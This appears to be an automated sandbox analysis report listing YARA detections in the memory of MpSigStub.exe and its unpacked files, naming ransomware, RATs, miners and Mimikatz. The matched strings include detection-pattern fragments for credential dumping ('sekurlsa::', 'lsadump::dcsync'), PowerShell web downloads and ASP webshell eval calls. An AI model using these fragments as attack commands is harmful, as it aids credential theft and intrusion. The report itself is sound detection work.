Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_LockBit_ransomware	Yara detected LockBit ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Zeppelin	Yara detected Zeppelin Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Ryuk	Yara detected Ryuk ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Artemon	Yara detected Artemon Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Xorist_ransomware	Yara detected Xorist ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Delta	Yara detected Delta Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_MSIL_Load_Encrypted_Assembly	Yara detected MSIL_Load_Encrypted_Assembly	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Nemty	Yara detected Nemty Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Avaddon	Yara detected Avaddon Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_CryLock	Yara detected CryLock ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Growtopia	Yara detected Growtopia	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_lockfile	Yara detected LOCKFILE ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Winexe_tool	Yara detected Winexe tool	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_blackmatter	Yara detected BLACKMatter Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Marvel	Yara detected Marvel Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Chaos	Yara detected Chaos Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Nukesped	Yara detected Nukesped	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_NetWire_1	Yara detected NetWire RAT	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Gocoder_3	Yara detected Gocoder ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_WannaRen	Yara detected WannaRen ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Gocoder	Yara detected Gocoder ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_LimeRAT	Yara detected LimeRAT	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Parallax_RAT	Yara detected Parallax RAT	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_babuk	Yara detected Babuk Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Mimikatz_1	Yara detected Mimikatz	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Silvertor	Yara detected Silvertor Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Conti_ransomware	Yara detected Conti ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_vhd	Yara detected VHD ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Netwalker	Yara detected Netwalker ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_bitcoinminer	Yara detected BitCoin Miner	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_RekenSom	Yara detected RekenSom ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Annabelle	Yara detected Annabelle Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_RemComRemoteAdmin	Yara detected RemCom RemoteAdmin tool	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Shellcode_Injector	Yara detected generic Shellcode Injector	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_lazparking	Yara detected LazParking Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Jigsaw	Yara detected Jigsaw	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_WinSecDisabler	Yara detected Windows Security Disabler	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Snatch	Yara detected Snatch Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Cute	Yara detected Cute Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_apis	Yara detected Apis Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_mock	Yara detected Mock Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_PornRansomware	Yara detected Porn Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_RegretLocker	Yara detected RegretLocker Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Ransomware_Generic	Yara detected Ransomware_Generic	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_DiscordTokenStealer	Yara detected Discord Token Stealer	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Thanos	Yara detected Thanos ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_covid19	Yara detected Covid19 Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Cobra_Locker	Yara detected Cobra Locker ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_MaliciousMacro	Yara detected MaliciousMacro	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_PasteDownloader	Yara detected PasteDownloader	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Sapphire	Yara detected Sapphire Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_hidden_tear	Yara detected HiddenTear ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_VB6DownloaderGeneric	Yara detected VB6 Downloader Generic	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Predator	Yara detected Predator	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	vanquish_2	Webshells Auto-generated - file vanquish.exe	Yara Bulk Rule Generator by Florian Roth	0xa81a13:$s2: Vanquish - DLL injection failed: 0xa81a35:$s2: Vanquish - DLL injection failed:
Process Memory Space: MpSigStub.exe PID: 5556	fe_cpe_ms17_010_ransomware	probable petya ransomware using eternalblue, wmic, psexec	ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick	0xab17e:$dmap01: \\.\PhysicalDrive 0x1254ec:$dmap01: \\.\PhysicalDrive 0x1e7420:$dmap01: \\.\PHYSICALDRIVE 0x202a54:$dmap01: \\.\PHYSICALDRIVE 0x218b3e:$dmap01: \\.\PhysicalDrive 0x2a3dc5:$dmap01: \\.\PhysicalDrive 0x464606:$dmap01: \\.\PHYSICALDRIVE 0x480bd4:$dmap01: \\.\PHYSICALDRIVE 0x49c9ae:$dmap01: \\.\PHYSICALDRIVE 0x49cef6:$dmap01: \\.\PhysicalDrive 0x4b36f4:$dmap01: \\.\PHYSICALDRIVE 0x4b3707:$dmap01: \\.\PHYSICALDRIVE 0x4b3749:$dmap01: \\.\PHYSICALDRIVE 0x59cf3e:$dmap01: \\.\PhysicalDrive 0x64caa6:$dmap01: \\.\PHYSICALDRIVE 0x690809:$dmap01: \\.\PhysicalDrive 0x702865:$dmap01: \\.\PhysicalDrive 0x71523b:$dmap01: \\.\PHYSICALDRIVE 0x71524f:$dmap01: \\.\PHYSICALDRIVE 0x8a2232:$dmap01: \\.\Physicaldrive 0xa5d6c8:$dmap01: \\.\PHYSICALDRIVE
Process Memory Space: MpSigStub.exe PID: 5556	APT9002Strings	9002 Identifying Strings	Seth Hardy	0x39b619:$: %%TEMP%%\%s_p.ax
Process Memory Space: MpSigStub.exe PID: 5556	APT_DeputyDog_Fexel	unknown	ThreatConnect Intelligence Research Team	0x12fd4a:$cUp: Upload failed! [Remote error code: 0x3f2565:$cUp: Upload failed! [Remote error code: 0x3f25a8:$GDGSYDLYR: GDGSYDLYR_%
Process Memory Space: MpSigStub.exe PID: 5556	MirageStrings	Mirage Identifying Strings	Seth Hardy	0x83defa:$: Neo,welcome to the desert of real.
Process Memory Space: MpSigStub.exe PID: 5556	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xde4a0:$a: NanoCore 0xe1849:$a: NanoCore 0x2e8249:$a: NanoCore 0x377631:$a: NanoCore 0x3bb25d:$a: NanoCore 0x64b3d9:$a: NanoCore 0x6cd3ce:$a: NanoCore 0x72a079:$a: NanoCore 0x806ab9:$a: NanoCore 0x8096d1:$a: NanoCore 0x8533a7:$a: NanoCore 0x93d1b5:$a: NanoCore 0xa7ebe5:$a: NanoCore 0xacf551:$a: NanoCore 0xbbbe97:$a: NanoCore 0x7aedeb:$b: ClientPlugin 0x7aee04:$b: ClientPlugin 0x7aee15:$b: ClientPlugin 0x13cab7:$c: ProjectData 0x13d10b:$c: ProjectData 0x35f01e:$c: ProjectData
Process Memory Space: MpSigStub.exe PID: 5556	NetWiredRC_B	NetWiredRC	Jean-Philippe Teissier / @Jipe_	0xb36e8c:$str4: [%s] - [%.2d/%.2d/%d %.2d:%.2d:%.2d] 0x7b0840:$str5: %.2d/%.2d/%d %.2d:%.2d:%.2d 0xb3200f:$str5: %.2d/%.2d/%d %.2d:%.2d:%.2d 0xb36e94:$str5: %.2d/%.2d/%d %.2d:%.2d:%.2d 0x66dcd5:$klg1: [Backspace] 0x66e4f1:$klg1: [Backspace] 0x706db8:$klg2: [Enter] 0x849950:$klg2: [Enter] 0x849964:$klg2: [Enter] 0x907093:$klg3: [Tab] 0x6b237a:$klg8: [Home] 0x9cbd55:$klg10: [Page Down] 0x9cbd61:$klg11: [End] 0x44187b:$klg14: [Insert] 0x64ca8a:$klg15: [Print Screen] 0x85d724:$klg16: [Scroll Lock] 0x66e4e5:$klg17: [Caps Lock] 0x66e4fc:$klg17: [Caps Lock] 0xa3f918:$klg18: [Alt] 0x90708d:$klg19: [Esc]
Process Memory Space: MpSigStub.exe PID: 5556	netwire	detect netwire in memory	JPCERT/CC Incident Response Group	0x495dd5:$v2: mozsqlite3 0x85d724:$v3: [Scroll Lock] 0x1ae44b:$v4: GetRawInputData 0x1af608:$v4: GetRawInputData 0x45cb08:$v4: GetRawInputData 0xa9b52a:$v4: GetRawInputData 0xb31ffe:$log: [Log Started] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]
Process Memory Space: MpSigStub.exe PID: 5556	PoisonIvy_3	unknown	Kevin Breen <kevin@techanarchy.net>	0x5cef5:$stub: StubPath 0x5cf1c:$stub: StubPath 0x7edbec:$stub: StubPath 0x830a07:$string1: CONNECT %s:%i HTTP/1.0 0x53579:$string2: ws2_32 0x104f6b:$string2: ws2_32 0x104f72:$string2: ws2_32 0x176a8c:$string2: ws2_32 0x1bc94a:$string2: ws2_32 0x23d05a:$string2: ws2_32 0x23d07c:$string2: ws2_32 0x23d0bf:$string2: ws2_32 0x23d0f0:$string2: ws2_32 0x23d112:$string2: ws2_32 0x23d155:$string2: ws2_32 0x23d184:$string2: ws2_32 0x23d1a6:$string2: ws2_32 0x23d1e9:$string2: ws2_32 0x23d21a:$string2: ws2_32 0x23d23c:$string2: ws2_32 0x23d27f:$string2: ws2_32
Process Memory Space: MpSigStub.exe PID: 5556	CVE_2018_4878_0day_ITW	unknown	unknown	0xca1ae7:$known1: f:\work\flash\obfuscation\loadswf\src 0xca1b32:$known1: f:\work\flash\obfuscation\loadswf\src 0xca1ae7:$known5: f:\work\flash\obfuscation\loadswf\src 0xca1b32:$known5: f:\work\flash\obfuscation\loadswf\src 0x7ea01c:$header: rdf:RDF 0x67bacc:$loader1: URLRequest 0x67bad7:$loader1: URLRequest 0x67ba64:$loader2: URLLoader 0x67ba6e:$loader2: URLLoader 0xca1ac4:$loader3: loadswf 0xca1ad5:$loader3: loadswf 0xca1adf:$loader3: loadswf 0xca1b01:$loader3: loadswf 0xca1b0f:$loader3: loadswf 0xca1b20:$loader3: loadswf 0xca1b2a:$loader3: loadswf 0xca1b4c:$loader3: loadswf 0x91100:$flash_magic: 46 57 53 0xeaba8:$flash_magic: 43 57 53 0xeabc5:$flash_magic: 43 57 53 0xeabd9:$flash_magic: 43 57 53
Click to see the 565 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
36.3.MpSigStub.exe.197a36f3b2a.205.unpack	MAL_Turla_Agent_BTZ	Detects Turla Agent.BTZ	Florian Roth	0x661b:$x5: mfc42l00.pdb 0x65e8:$s3: %s\system32
36.3.MpSigStub.exe.197a36f3b2a.205.unpack	dump_tool	unknown	@patrickrolsen	0x4f2d:$s4: fgdump 0x4f37:$s5: fgexec 0x4f37:$s6: fgexecpipe
36.3.MpSigStub.exe.197a359b15e.156.raw.unpack	SUSP_Microsoft_7z_SFX_Combo	Detects a suspicious file that has a Microsoft copyright and is a 7z SFX	Florian Roth	0x15744:$s1: 7ZSfx%03x.cmd 0x85d:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0x144d:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0x205d:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ...
36.3.MpSigStub.exe.197a3f84db6.63.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x16a3d:$s1: stratum+tcp://
36.3.MpSigStub.exe.197a3f84db6.63.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
36.3.MpSigStub.exe.197a48b4c13.120.raw.unpack	webshell_asp_generic_eval_on_input	Generic ASP webshell which uses any eval/exec function directly on user input	Arnim Rupp	0x128da:$payload_and_input1: eval(request. 0x128bd:$tagasp_short1: <%@ 0x128d8:$tagasp_short1: <%e 0x6aa6:$tagasp_short2: %> 0x128d6:$tagasp_short2: %> 0x128fc:$tagasp_short2: %> 0x128d8:$tagasp_long13: <%ev 0x128bd:$tagasp_long20: <%@pagelanguage="jscript 0x105e1:$jsp4: public
36.3.MpSigStub.exe.197a36f3b2a.148.unpack	MAL_Turla_Agent_BTZ	Detects Turla Agent.BTZ	Florian Roth	0x661b:$x5: mfc42l00.pdb 0x65e8:$s3: %s\system32
36.3.MpSigStub.exe.197a36f3b2a.148.unpack	dump_tool	unknown	@patrickrolsen	0x4f2d:$s4: fgdump 0x4f37:$s5: fgexec 0x4f37:$s6: fgexecpipe
36.3.MpSigStub.exe.197a3279566.201.raw.unpack	Oilrig_IntelSecurityManager	Detects OilRig malware	Eyal Sela	0x6bb5:$one3: srvCheckresponded
36.3.MpSigStub.exe.197a3279566.201.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x94e3:$s1: stratum+tcp://
36.3.MpSigStub.exe.197a3279566.201.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
36.3.MpSigStub.exe.197a3279566.201.raw.unpack	JoeSecurity_Winexe_tool	Yara detected Winexe tool	Joe Security
36.3.MpSigStub.exe.197a3279566.201.raw.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
36.3.MpSigStub.exe.197a364b8a5.203.raw.unpack	Tofu_Backdoor	Detects Tofu Trojan	Cylance	0x4d0a:$a: Cookies: Sym1.0 0x4cab:$c: 66 0F FC C1 0F 11 40 D0 0F 10 40 D0 66 0F EF C2 0F 11 40 D0 0F 10 40 E0
36.3.MpSigStub.exe.197a36f3b2a.205.raw.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
36.3.MpSigStub.exe.197a36f3b2a.205.raw.unpack	dump_tool	unknown	@patrickrolsen	0x5b2d:$s4: fgdump 0x5b37:$s5: fgexec 0x5b37:$s6: fgexecpipe
36.3.MpSigStub.exe.197a4a13be1.134.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x594d:$s1: stratum+tcp://
36.3.MpSigStub.exe.197a4a13be1.134.raw.unpack	JoeSecurity_bitcoinminer	Yara detected BitCoin Miner	Joe Security
36.3.MpSigStub.exe.197a407e899.150.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x10bff:$s1: stratum+tcp:// 0x1181b:$s1: stratum+tcp://
36.3.MpSigStub.exe.197a407e899.150.raw.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x1e947:$e3: exe.rerolpxe
36.3.MpSigStub.exe.197a407e899.150.raw.unpack	JoeSecurity_Conti_ransomware	Yara detected Conti ransomware	Joe Security
36.3.MpSigStub.exe.197a359bd62.155.raw.unpack	SUSP_Microsoft_7z_SFX_Combo	Detects a suspicious file that has a Microsoft copyright and is a 7z SFX	Florian Roth	0x14b40:$s1: 7ZSfx%03x.cmd 0x849:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0x1459:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ...
36.3.MpSigStub.exe.197a4a13be1.171.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x594d:$s1: stratum+tcp://
36.3.MpSigStub.exe.197a4a13be1.171.raw.unpack	JoeSecurity_bitcoinminer	Yara detected BitCoin Miner	Joe Security
36.3.MpSigStub.exe.197a4fa798e.184.raw.unpack	APT_MAL_Sandworm_Exaramel_Configuration_Key	Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...	FR/ANSSI/SDO	0x5f1e:$: odhyrfjcnfkdtslt
36.3.MpSigStub.exe.197a4fa798e.184.raw.unpack	APT_APT29_sorefang_modify_alphabet_custom_encode	Rule to detect SoreFang based on arguments passed into custom encoding algorithm function	NCSC	0x5946:$: 33 C0 8B CE 6A 36 6A 71 66 89 46 60 88 46 62 89 46 68 66 89 46 64
36.3.MpSigStub.exe.197a4dc49fa.86.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x11722:$s1: stratum+tcp://
36.3.MpSigStub.exe.197a4dc49fa.86.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
36.3.MpSigStub.exe.197a4dc49fa.86.raw.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
36.3.MpSigStub.exe.197a364b8a5.181.raw.unpack	Tofu_Backdoor	Detects Tofu Trojan	Cylance	0x4d0a:$a: Cookies: Sym1.0 0x4cab:$c: 66 0F FC C1 0F 11 40 D0 0F 10 40 D0 66 0F EF C2 0F 11 40 D0 0F 10 40 E0
36.3.MpSigStub.exe.197a4f46966.113.raw.unpack	APT_DeputyDog_Fexel	unknown	ThreatConnect Intelligence Research Team	0xd112:$cUp: Upload failed! [Remote error code:
36.3.MpSigStub.exe.197a3929e2b.149.unpack	REDLEAVES_CoreImplant_UniqueStrings	Strings identifying the core REDLEAVES RAT in its deobfuscated state	USG	0x18f6:$unique4: red_autumnal_leaves_dllmain.dll
36.3.MpSigStub.exe.197a4df1a99.144.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0x3c2b:$x1: ReflectiveLoader
36.3.MpSigStub.exe.197a407d495.109.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x12003:$s1: stratum+tcp:// 0x12c1f:$s1: stratum+tcp://
36.3.MpSigStub.exe.197a407d495.109.raw.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x1fd4b:$e3: exe.rerolpxe
36.3.MpSigStub.exe.197a407d495.109.raw.unpack	JoeSecurity_Conti_ransomware	Yara detected Conti ransomware	Joe Security
36.3.MpSigStub.exe.197a39e033e.65.unpack	Oilrig_IntelSecurityManager_macro	Detects OilRig malware	Eyal Sela (slightly modified by Florian Roth)	0x231fb:$one6: Shell Environ$("COMSPEC") & " /c
36.3.MpSigStub.exe.197a39e033e.65.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
36.3.MpSigStub.exe.197a47aa096.53.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x7148:$s1: http:// 0x7285:$s1: http:// 0x72a0:$s1: http:// 0x72bf:$s1: http:// 0x72d9:$s1: http:// 0x72f7:$s1: http:// 0x7313:$s1: http:// 0x7a4e:$s1: http:// 0x7a6a:$s1: http:// 0x7a92:$s1: http:// 0x7aba:$s1: http:// 0x7af2:$s1: http:// 0x7b7d:$s1: http:// 0x1f643:$s1: http:// 0x21666:$s1: http:// 0x25853:$s1: http:// 0x2771b:$s1: http:// 0x295f2:$s1: )551{nn 0x2960a:$s1: http:// 0x34204:$s1: http:// 0x3533c:$s1: http://
36.3.MpSigStub.exe.197a47aa096.53.raw.unpack	APT_Backdoor_Win_GoRat_Memory	Identifies GoRat malware in memory based on strings.	FireEye	0x24bb0:$rat1: rat/modules/socks.(HTTPProxyClient).beacon 0x24a8d:$rat2: rat.(Core).generateBeacon 0x24aaa:$rat3: rat.gJitter 0x24ab8:$rat4: rat/comms.(protectedChannel).SendCmdResponse 0x24b1e:$rat6: rat/modules/latlisten.(latlistensrv).handleCmd 0x24b86:$rat8: rat/modules/netsweeper.(Pinger).listen 0x24bb0:$rat9: rat/modules/socks.(HTTPProxyClient).beacon 0x24bde:$rat10: rat/platforms/win/dyloader.(memoryLoader).ExecutePluginFunction 0x24a64:$winblows: rat/platforms/win.(winblows).GetStage
36.3.MpSigStub.exe.197a4301256.107.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
36.3.MpSigStub.exe.197a4dc6bfe.187.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0xf51e:$s1: stratum+tcp://
36.3.MpSigStub.exe.197a4dc6bfe.187.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
36.3.MpSigStub.exe.197a4dc6bfe.187.raw.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
36.3.MpSigStub.exe.197a407d495.152.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x12003:$s1: stratum+tcp:// 0x12c1f:$s1: stratum+tcp://
36.3.MpSigStub.exe.197a407d495.152.raw.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x1fd4b:$e3: exe.rerolpxe
36.3.MpSigStub.exe.197a407d495.152.raw.unpack	JoeSecurity_Conti_ransomware	Yara detected Conti ransomware	Joe Security
36.3.MpSigStub.exe.197a47aa096.213.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x7148:$s1: http:// 0x7285:$s1: http:// 0x72a0:$s1: http:// 0x72bf:$s1: http:// 0x72d9:$s1: http:// 0x72f7:$s1: http:// 0x7313:$s1: http:// 0x7a4e:$s1: http:// 0x7a6a:$s1: http:// 0x7a92:$s1: http:// 0x7aba:$s1: http:// 0x7af2:$s1: http:// 0x7b7d:$s1: http:// 0x1f643:$s1: http:// 0x21666:$s1: http:// 0x25853:$s1: http:// 0x2771b:$s1: http:// 0x295f2:$s1: )551{nn 0x2960a:$s1: http:// 0x34204:$s1: http:// 0x3533c:$s1: http://
36.3.MpSigStub.exe.197a47aa096.213.raw.unpack	APT_Backdoor_Win_GoRat_Memory	Identifies GoRat malware in memory based on strings.	FireEye	0x24bb0:$rat1: rat/modules/socks.(HTTPProxyClient).beacon 0x24a8d:$rat2: rat.(Core).generateBeacon 0x24aaa:$rat3: rat.gJitter 0x24ab8:$rat4: rat/comms.(protectedChannel).SendCmdResponse 0x24b1e:$rat6: rat/modules/latlisten.(latlistensrv).handleCmd 0x24b86:$rat8: rat/modules/netsweeper.(Pinger).listen 0x24bb0:$rat9: rat/modules/socks.(HTTPProxyClient).beacon 0x24bde:$rat10: rat/platforms/win/dyloader.(memoryLoader).ExecutePluginFunction 0x24a64:$winblows: rat/platforms/win.(winblows).GetStage
36.3.MpSigStub.exe.197a37e87d6.70.raw.unpack	clearlog	Detects Fireball malware - file clearlog.dll	Florian Roth	0x290c1:$s3: hhhhh.exe 0x290ab:$s4: ttttt.exe 0x29095:$s6: cle.log.1
36.3.MpSigStub.exe.197a407fe9d.151.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0xf5fb:$s1: stratum+tcp:// 0x10217:$s1: stratum+tcp://
36.3.MpSigStub.exe.197a407fe9d.151.raw.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x1d343:$e3: exe.rerolpxe
36.3.MpSigStub.exe.197a407fe9d.151.raw.unpack	JoeSecurity_Conti_ransomware	Yara detected Conti ransomware	Joe Security
36.3.MpSigStub.exe.197a32ef4fa.18.raw.unpack	Molerats_Jul17_Sample_5	Detects Molerats sample - July 2017	Florian Roth	0x29eda:$a1: net.webclient).downloadstring 0x2a8cb:$a1: net.webclient).downloadstring 0x2b638:$a1: net.webclient).downloadstring 0x29f01:$a2: gist.githubusercontent.com
36.3.MpSigStub.exe.197a32ef4fa.18.raw.unpack	Hacktool_Strings_p0wnedShell	p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs	Florian Roth	0x6224:$x3: lsadump::dcsync
36.3.MpSigStub.exe.197a32ef4fa.18.raw.unpack	Suspicious_PowerShell_WebDownload_1	Detects suspicious PowerShell code that downloads from web sites	Florian Roth	0x29ed3:$s2: system.net.webclient).downloadstring('http
36.3.MpSigStub.exe.197a32ef4fa.18.raw.unpack	Mimikatz_Memory_Rule_1	Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures)	Florian Roth	0x62ed:$s5: sekurlsa::tspkg 0x62aa:$s13: sekurlsa::ekeys 0x6267:$s14: sekurlsa::dpapi
36.3.MpSigStub.exe.197a3f2e43a.61.raw.unpack	Mimikatz_Memory_Rule_1	Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures)	Florian Roth	0x29e4e:$s1: sekurlsa::msv 0x29ed0:$s7: sekurlsa::ssp 0x29e8f:$s11: sekurlsa::pth
36.3.MpSigStub.exe.197a364dcf9.202.raw.unpack	Tofu_Backdoor	Detects Tofu Trojan	Cylance	0x28b6:$a: Cookies: Sym1.0 0x2857:$c: 66 0F FC C1 0F 11 40 D0 0F 10 40 D0 66 0F EF C2 0F 11 40 D0 0F 10 40 E0
36.3.MpSigStub.exe.197a4fa8d92.185.raw.unpack	APT_MAL_Sandworm_Exaramel_Configuration_Key	Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...	FR/ANSSI/SDO	0x4b1a:$: odhyrfjcnfkdtslt
36.3.MpSigStub.exe.197a4fa8d92.185.raw.unpack	APT_APT29_sorefang_modify_alphabet_custom_encode	Rule to detect SoreFang based on arguments passed into custom encoding algorithm function	NCSC	0x4542:$: 33 C0 8B CE 6A 36 6A 71 66 89 46 60 88 46 62 89 46 68 66 89 46 64
